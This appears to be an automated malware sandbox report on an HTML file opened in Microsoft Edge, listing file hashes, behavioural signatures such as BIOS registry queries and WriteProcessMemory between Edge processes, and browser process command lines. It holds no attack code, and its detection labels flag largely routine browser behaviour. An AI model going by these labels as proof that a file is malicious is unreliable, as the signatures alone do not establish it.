C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 633efef27c2ac53e79db05e28854fdff
SHA1 b03ff144bf617c5de2737e215bf08281f4beb6d1
SHA256 8035b4f3f452458451e4720eed0df7d870c5b8c51613b732605e14b21a97393f
SHA512 45764648e10613c05b8278f349c38d41763c6573ad5dbce7ab246743d46e527caffa953dd0985ee066ecf66ab320f557f9946dc60520a50ce0f24b9dcbbec79f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a9e310905ee57057115145889cbb2259
SHA1 4bc946eedf984544c44e5413de7fd70a2d5b0a72
SHA256 a22f8f4b367101c9c64f7c66c1c9e3922269258d284b72d8113f140c0ece22b9
SHA512 5b26baa801436501578bbce9f65b05bf164df4620e7a296406f5716d1268ab5262e4dbf641d24f936310ae74d58657188c6bf571eb515a5a568ab72467946292

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b3cf987dc2bfb5e9226dd9b9304d1650
SHA1 ef95371e5708ed247734f9ad5ffe4bab85a16a92
SHA256 1334db1f2492ccd1fa225be7fdf8e57e91af3d36af683cea60caa323f1f1cd13
SHA512 6d9fa29ad7032b390a50d0c33340aa4d13ef0b541c75a9d8862a728ee732c84f96bffe2717b2e03f2c35440dcb245509cca35d0a732dc4f60635d6cd2ce45a76

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ddf798bf184236a7dd6dac9d98020117
SHA1 d5f74ac86b6db1880c6389c8d6eb44cff65b2466
SHA256 84e08b0dd321937bd5d2ca3ad29acb8d62b0fa35cf54226792198569f9571dac
SHA512 bf2df486c94c76a7e01b2871fcf7d4beee75ae9f7787df1751efc5da0527372a86e29c0a84a5f2f4c694ca807a0a2bb97511476e332c8d6c8a90aa580e0b3c28

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1db7307612f6dda7eb55221087b2ab0f
SHA1 cec07a73741484edd1a0a52805ff84c74ff11ba3
SHA256 4519218bb968c0966fefe45f73ad95ae701703311397583bf2bc2ebe32c378c8
SHA512 5f1e8e9c3bc133e6c72aa3f19a547eb2c97efdf87822c968f2d09752ad36f47eca9610bf388734fb9fc411606d199ae0fcbb21878dd10afa6bd0409fcd2f4c39

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b135fa4a1836a32940cb1d4a023e2607
SHA1 9953e585906018970fd2cd71d6d9ea785384ab01
SHA256 11d45d90251b6662db885e66134dc13b919742a2af60a2c7f0dc1380b427e87e
SHA512 820aaa47682dfc76646a05fa08cfce020cc3ff9275d53286d8e8d67a6301819928b6260a5be48c68cd315da646ac9854a9d57083d0a0dbc13c953fedfd9b55ae

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6622230916d4c139b103ae68dbc584d9
SHA1 7dead63d70c530138b4cd4f3a828e6edceebbedc
SHA256 9c76ea7e96f7ef6eb815ef8fae1bd8be5acdbf2abea2c34770b0b201c588dc5f
SHA512 f68d0efc33fef9a1165c1b4161a08ada0d54a89fc3584743a6bfcd9cb132ac1b359c1b97e45fce2b2abf8d688639f8ec309d06517dc81fc6582903b1ffb114ab

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 97ff4a78099bf01e804e5b516d7d1bdb
SHA1 279cc32d4ec2558eb02796c5580b4cf738431864
SHA256 f2d2bc398ddc95b9263bd598cb6ab1a5c3d605594d29b2f204848a705a0ca45a
SHA512 f3478c310c7e129d9449e4852e56336a133d4afaf9b4ed4593e3bca67bbf1994f875b5a6293eb6ebf044c79e414a3dc94654a72aa43b88b77920deaf97ccd8be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c34f96ca529c95b7a6350a76ed2ccccc
SHA1 6a45e8d7ce306d2d3b94a71a2af0fdc508955a77
SHA256 164571947374b550d9b8e25e7ab49c4f1343e676a4052f039c6e5890314c0ae8
SHA512 c9991a3208a108e5dac82bdcc7495a6816de44baaee8cad0d89eb239cb0ed220a874e458d629b68e1a7273f53114061189e4bc46228237c6e01112fcab881904

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 edb4c274d14bb01f25c9bd696c187932
SHA1 6d09eb23afae8379ca23e1c5b2d5533a71f846c4
SHA256 6d9eef54016ab86f31cacb69dea4eac986befb92849ccb4c79182bb83a7a3f92
SHA512 e32a006e78399d5cd2220fb665774aca3145c8c481ac161d53535819cb3db6084782ccc547d67e1de27b954c1d4c10d326e475b20abe1682bb209cb177511395

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9afc8e37a2c774b4553d0f02bd319728
SHA1 39d918b2457213c7cfa35a4980b030358093b0ad
SHA256 db56820d424a8504754e0ce6643ba196ca35594d67f08c2ac48bda8b1b23ea02
SHA512 f0d7a612df10cd91873022f3210dc5256decbe521d317731a3110b3107c8417f95bfb6189afe40549120effd539ed79ce66b9a1cad6d268383d6b79aff8d6650

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 91eab65a420a43b3bf3d2dd6889c1605
SHA1 f3ebb0d16fcd1f622902980cf48c1aeaf59c1c77
SHA256 8dc6e8b136831be6d5821a28ecabe53352458764ed465177dea6678e0c85a450
SHA512 bbc0eab4997579452b9f66d1c2f5d7c7230fbb554a096404468e5fac1913dfc86b124f9a96b618fdaae9103d6646303d72810d0bfc390473199808cffba231cd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bfe462ee453a1eec1d166815c18c4e79
SHA1 0e8394b16e0e1b2c23ac5fc3e968bc50ddbc26f3
SHA256 d946f24fe9855dcc9769f85788958d687278a82813e1288a3a32bd0410709c1c
SHA512 2c69a158cc08a913b66bc15461fb3ba2b98dfc73f80cdff431d5e167623501057817400a699646f1dde96bf17f03a6a526d64170d2dab2294897583d1ec525ce

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 15d5c83058285ad9e8e1881d8a77c25f
SHA1 78fffd02e1f8b40c10420f774f058ea7607be4de
SHA256 e8b4a1037a75850bb1d038288eb2422eacccd1ae15e9008cdfb2bde2499bea6d
SHA512 353c51e5f140af992403aa64394ab32f791d9ef013956bb71cf6146695aa957aaecac21b60239a3680931c8572e681276039a40d3aa8db934b20a2b6a056c5d9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3c9c6234d873fa09aa8d32f2606e6018
SHA1 eb2204e055fe9670c0d1d8bf70aa84204d220a8d
SHA256 e21396aca0e81c766cecd35acb1f9a7d151cb487ffd4bd72004ffced23aed93c
SHA512 c1971276eeccc1eb772b8758ff693aaa989900850fbeb5b512f69ac4f4aa1cb7287fc268a935ccc1011bd27fdca54931bf0ad5ecaf7b54a4629cc9e910358adc

Analysis: behavioral12

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

140s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 3352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 3352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff4b4346f8,0x7fff4b434708,0x7fff4b434718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

